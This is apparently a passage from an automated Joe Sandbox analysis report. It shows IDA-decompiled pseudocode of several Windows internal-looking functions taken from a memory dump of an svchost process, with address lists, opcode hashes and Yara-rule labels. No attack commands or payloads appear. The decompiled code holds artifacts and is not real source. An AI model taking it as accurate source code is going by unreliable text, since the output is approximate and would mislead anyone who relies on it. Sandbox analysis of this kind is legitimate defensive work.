				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x3b1d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E03A6D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E03A42280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L03A44620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E03A6F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E03A3FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x3b1b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E03A6B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                          0x03a55142
                                          0x03a5514c
                                          0x03a55150
                                          0x03a55157
                                          0x03a55159
                                          0x03a5515e
                                          0x03a55165
                                          0x03a55169
                                          0x03a5516c
                                          0x03a55172
                                          0x03a55176
                                          0x03a5517a
                                          0x03a5517a
                                          0x03a5517a
                                          0x03a5517f
                                          0x03a96d8b
                                          0x03a96d8e
                                          0x03a96d91
                                          0x03a96d95
                                          0x03a96d98
                                          0x03a96d9c
                                          0x03a96da0
                                          0x03a96da3
                                          0x03a96da7
                                          0x03a96e26
                                          0x03a96e26
                                          0x03a96e2a
                                          0x03a551f9
                                          0x03a551f9
                                          0x03a551fe
                                          0x03a96e33
                                          0x03a96e33
                                          0x03a96e39
                                          0x03a96e3d
                                          0x03a96e46
                                          0x03a96e50
                                          0x00000000
                                          0x00000000
                                          0x03a96e52
                                          0x03a96e53
                                          0x03a96e56
                                          0x03a96e5d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03a96e5f
                                          0x03a96e67
                                          0x03a96e77
                                          0x03a96e7f
                                          0x03a96e80
                                          0x03a96e88
                                          0x03a96e90
                                          0x03a96e9f
                                          0x03a96ea5
                                          0x03a96ea9
                                          0x03a96eb1
                                          0x03a96ebf
                                          0x00000000
                                          0x00000000
                                          0x03a96ecf
                                          0x03a96ed3
                                          0x00000000
                                          0x00000000
                                          0x03a96edb
                                          0x03a96ede
                                          0x03a96ee1
                                          0x03a96ee8
                                          0x03a96eeb
                                          0x03a96eed
                                          0x03a96ef0
                                          0x03a96ef4
                                          0x03a96ef8
                                          0x03a96efc
                                          0x00000000
                                          0x00000000
                                          0x03a96f0d
                                          0x03a96f11
                                          0x03a96f32
                                          0x03a96f37
                                          0x03a96f3b
                                          0x03a96f3e
                                          0x03a96f41
                                          0x03a96f46
                                          0x00000000
                                          0x00000000
                                          0x03a96f4c
                                          0x03a96f50
                                          0x03a96f50
                                          0x03a96f54
                                          0x03a96f62
                                          0x03a96f65
                                          0x03a96f6d
                                          0x03a96f7b
                                          0x03a96f7b
                                          0x03a96f93
                                          0x03a96f98
                                          0x03a96fa0
                                          0x03a96fa6
                                          0x03a96fb3
                                          0x03a96fb6
                                          0x03a96fbf
                                          0x03a96fc1
                                          0x03a96fd5
                                          0x03a96fda
                                          0x03a96fda
                                          0x03a96fdd
                                          0x03a96fe2
                                          0x03a96fe7
                                          0x03a96feb
                                          0x03a96fef
                                          0x03a96ff3
                                          0x03a5520c
                                          0x03a5520c
                                          0x03a5520f
                                          0x03a55215
                                          0x03a55234
                                          0x03a5523a
                                          0x03a5523a
                                          0x03a55244
                                          0x03a55245
                                          0x03a55246
                                          0x03a55251
                                          0x03a55251
                                          0x03a96f13
                                          0x03a96f17
                                          0x03a96f17
                                          0x03a96f18
                                          0x03a96f1b
                                          0x03a96f1f
                                          0x03a96f23
                                          0x00000000
                                          0x03a96f28
                                          0x03a55204
                                          0x03a55204
                                          0x03a55208
                                          0x00000000
                                          0x03a55208
                                          0x03a55185
                                          0x03a55188
                                          0x03a5518a
                                          0x03a5518e
                                          0x03a55195
                                          0x03a96db1
                                          0x03a96db5
                                          0x03a96db9
                                          0x03a5519b
                                          0x03a5519b
                                          0x03a5519e
                                          0x03a551a7
                                          0x03a551a9
                                          0x03a551a9
                                          0x03a551b5
                                          0x03a551b8
                                          0x03a551bb
                                          0x03a551be
                                          0x03a551c1
                                          0x03a551c5
                                          0x03a551c9
                                          0x03a551cd
                                          0x03a551cd
                                          0x03a551d8
                                          0x03a551dc
                                          0x03a551e0
                                          0x03a96dcc
                                          0x03a96dd0
                                          0x03a96dd5
                                          0x03a96ddd
                                          0x03a96de1
                                          0x03a96de1
                                          0x03a96de5
                                          0x03a96deb
                                          0x03a96df1
                                          0x03a96df7
                                          0x03a96dfd
                                          0x03a96e01
                                          0x03a96e05
                                          0x03a96e09
                                          0x03a96e0d
                                          0x03a96e11
                                          0x03a96e11
                                          0x03a551eb
                                          0x03a96e1a
                                          0x03a96e1f
                                          0x03a96e21
                                          0x03a96e23
                                          0x00000000
                                          0x03a551f1
                                          0x03a551f1
                                          0x00000000
                                          0x03a551f1

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bef2414e9a4175267594f4a4a4eb2fb016b41b56defda04ab32708fcb6a9c59c
                                          • Instruction ID: 1a0a51c0dc6ee6d49ca8b1c296c69dd7423cd02a61dee7fa60e53d5862dc41d9
                                          • Opcode Fuzzy Hash: bef2414e9a4175267594f4a4a4eb2fb016b41b56defda04ab32708fcb6a9c59c
                                          • Instruction Fuzzy Hash: 1CC133755083808FD754CF28C580A5AFBF1BF89314F188A6EF89A9B362D771E945CB42
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A503E2 Relevance: .3, Instructions: 254COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 74%
                                          			E03A503E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x3b1d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E03A50548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E03A6B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E03A3B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x3b17c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E03A47D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E03A47D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E03AA7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E03A69830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E03AA69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x3b17c04 != 0) {
						_t118 = _v12;
						_t120 = E03AAA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x3b17bd8;
						if( *0x3b17bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E03A695D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E03A699A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E03AA3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E03A2B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E03A6AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x3b18474 - 3;
										if( *0x3b18474 != 3) {
											 *0x3b179dc =  *0x3b179dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E03A47D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E03A47D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E03AA7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x3b18708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x3b17b00; // 0x0
							asm("ror esi, cl");
							 *0x3b1b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E03A695D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E03A37F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                                          0x03a503f1
                                          0x03a503f7
                                          0x03a503f9
                                          0x03a503fb
                                          0x03a503fd
                                          0x03a50400
                                          0x03a5040a
                                          0x03a94c7a
                                          0x03a50537
                                          0x03a50547
                                          0x03a50410
                                          0x03a50410
                                          0x03a50414
                                          0x03a50417
                                          0x03a5041a
                                          0x03a50421
                                          0x03a50424
                                          0x03a5042b
                                          0x03a5043b
                                          0x03a5043e
                                          0x03a5043f
                                          0x03a5043f
                                          0x03a50446
                                          0x03a50449
                                          0x03a5044c
                                          0x03a5044f
                                          0x03a50459
                                          0x03a94c8d
                                          0x03a5045f
                                          0x03a5045f
                                          0x03a5045f
                                          0x03a50467
                                          0x03a94c97
                                          0x03a94c9d
                                          0x03a94ca4
                                          0x03a94caa
                                          0x03a94caf
                                          0x03a94cb1
                                          0x03a94cc3
                                          0x03a94cb3
                                          0x03a94cbc
                                          0x03a94cbc
                                          0x03a94cc8
                                          0x03a94ccb
                                          0x03a94cd7
                                          0x03a94cda
                                          0x03a94cdf
                                          0x03a94cdf
                                          0x03a94ccb
                                          0x03a94ca4
                                          0x03a5046d
                                          0x03a5046f
                                          0x03a5046f
                                          0x03a50471
                                          0x03a50476
                                          0x03a5047a
                                          0x03a5047b
                                          0x03a50483
                                          0x03a50489
                                          0x03a5048d
                                          0x00000000
                                          0x00000000
                                          0x03a94ce9
                                          0x03a94cef
                                          0x03a94d22
                                          0x03a94d22
                                          0x00000000
                                          0x03a94d22
                                          0x03a94cf1
                                          0x03a94cf7
                                          0x00000000
                                          0x00000000
                                          0x03a94cf9
                                          0x03a94cff
                                          0x00000000
                                          0x00000000
                                          0x03a94d05
                                          0x03a94d07
                                          0x00000000
                                          0x00000000
                                          0x03a94d0d
                                          0x03a94d0f
                                          0x03a94d14
                                          0x03a94d16
                                          0x00000000
                                          0x00000000
                                          0x03a94d1c
                                          0x03a94d1c
                                          0x03a50499
                                          0x03a50535
                                          0x03a50535
                                          0x00000000
                                          0x03a50535
                                          0x03a504a6
                                          0x03a94d2c
                                          0x03a94d37
                                          0x03a94d39
                                          0x03a94d3b
                                          0x00000000
                                          0x00000000
                                          0x03a94d41
                                          0x03a94d48
                                          0x03a50527
                                          0x03a5052b
                                          0x03a5052d
                                          0x03a50530
                                          0x03a50530
                                          0x00000000
                                          0x03a5052b
                                          0x03a94d4e
                                          0x03a504ac
                                          0x03a504ac
                                          0x03a504af
                                          0x03a504b2
                                          0x03a504b7
                                          0x03a504b9
                                          0x03a504bb
                                          0x03a504bd
                                          0x03a504bf
                                          0x03a504c5
                                          0x03a504c9
                                          0x03a94d53
                                          0x03a94d59
                                          0x03a94db9
                                          0x03a94dba
                                          0x03a94dbf
                                          0x03a94dc2
                                          0x03a94dc4
                                          0x03a94dc7
                                          0x03a94dce
                                          0x00000000
                                          0x03a94dce
                                          0x03a94d5b
                                          0x03a94d61
                                          0x00000000
                                          0x00000000
                                          0x03a94d63
                                          0x03a94d69
                                          0x00000000
                                          0x00000000
                                          0x03a94d6b
                                          0x03a94d6e
                                          0x03a94d74
                                          0x03a94d76
                                          0x03a94d7c
                                          0x03a94d7e
                                          0x03a94d84
                                          0x03a94d89
                                          0x03a94d8c
                                          0x03a94d8d
                                          0x03a94d92
                                          0x03a94d95
                                          0x03a94d96
                                          0x03a94d98
                                          0x03a94d9a
                                          0x03a94d9f
                                          0x03a94da4
                                          0x03a94da6
                                          0x03a94da8
                                          0x03a94daf
                                          0x03a94db1
                                          0x03a94db1
                                          0x03a94daf
                                          0x03a94da6
                                          0x03a94d84
                                          0x03a94d7c
                                          0x00000000
                                          0x03a94d74
                                          0x03a504d6
                                          0x03a94de1
                                          0x03a504dc
                                          0x03a504dc
                                          0x03a504dc
                                          0x03a504e4
                                          0x03a94deb
                                          0x03a94df1
                                          0x03a94df8
                                          0x03a94dfe
                                          0x03a94e03
                                          0x03a94e05
                                          0x03a94e17
                                          0x03a94e07
                                          0x03a94e10
                                          0x03a94e10
                                          0x03a94e1c
                                          0x03a94e1f
                                          0x03a94e35
                                          0x03a94e35
                                          0x03a94e1f
                                          0x03a94df8
                                          0x03a504f1
                                          0x03a504fa
                                          0x03a94e3f
                                          0x03a94e47
                                          0x03a94e5b
                                          0x03a94e61
                                          0x03a94e67
                                          0x03a94e69
                                          0x03a94e71
                                          0x03a94e73
                                          0x03a50500
                                          0x03a50500
                                          0x03a50500
                                          0x03a504fa
                                          0x03a50508
                                          0x03a5051d
                                          0x03a5051d
                                          0x03a5051f
                                          0x03a50524
                                          0x00000000
                                          0x03a50524
                                          0x03a50515
                                          0x03a50517
                                          0x03a94e7a
                                          0x03a94e7c
                                          0x00000000
                                          0x00000000
                                          0x03a94e85
                                          0x00000000
                                          0x03a94e85
                                          0x00000000
                                          0x03a50517

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7f4093fa3882c4258ff7846505354b1394e6af8912ea565221c4ad8c8f2ab487
                                          • Instruction ID: 6a7057dfd3e8e25b99a6b88f9e9df9b3e814c445fcaaf755508720f4caafc8d9
                                          • Opcode Fuzzy Hash: 7f4093fa3882c4258ff7846505354b1394e6af8912ea565221c4ad8c8f2ab487
                                          • Instruction Fuzzy Hash: 6F910275A00614AFEF21DB69C944BAEBBF4AB05724F09026BFD11AB2D0DB749D01C781
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 03A2C600 Relevance: .2, Instructions: 225COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E03A2C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x3b1d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E03A36D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E03A6B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x3b17b9c; // 0x0
					_t74 = L03A44620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E03A69650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L03A477F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E03A6F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E03A613C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L03A477F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
